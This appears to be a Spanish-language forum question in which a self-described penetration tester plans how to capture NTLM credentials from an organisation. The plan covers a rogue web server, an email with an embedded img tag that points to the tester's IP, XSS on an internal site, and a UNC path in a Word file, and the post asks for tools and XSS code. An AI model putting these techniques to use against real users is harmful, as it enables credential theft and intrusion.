Estoy intentando diseñar un vector de ataque contra una organización en la que el examinador de lápiz (yo mismo) roba las credenciales de NTLM a través de HTTP. Estoy pensando en estos escenarios:
1- Configuré un servidor web en mi máquina e ingenié a los usuarios para que lo visitaran.
2- Envío un correo electrónico con un <img src="my.ip.address/x.gif"/>
incrustado para que Outlook envíe las credenciales de NTLM automáticamente.
3- Uso XSS en un sitio web local suyo para obtener las credenciales de NTLM.
4- Ruta UNC a mi dirección IP en un archivo de Word.
Me gustaría obtener ayuda y opiniones en los siguientes asuntos:
- ¿Conoce alguna herramienta que ayude a automatizar algunas partes aquí?
- ¿La vinculación a los usuarios por dirección IP realmente los obligará a usar sus credenciales NTLM, no Kerberos?
- ¿Puedo realizar este ataque en un sistema que no sea IE?
- ¿Tiene que ser una zona de confianza en IE? ¿Mi dirección IP (local en su rango de red, no externa) se considerará una zona de confianza / parte del dominio en IE?
- ¿Cómo puedo obtenerlo en XSS? ¿Qué tipo de código XSS puede ayudar aquí?
- ¿La vista previa del documento de Outlook Word ejecutará mi truco UNC correctamente o tienen que descargarlo y ejecutarlo?
Muchas gracias.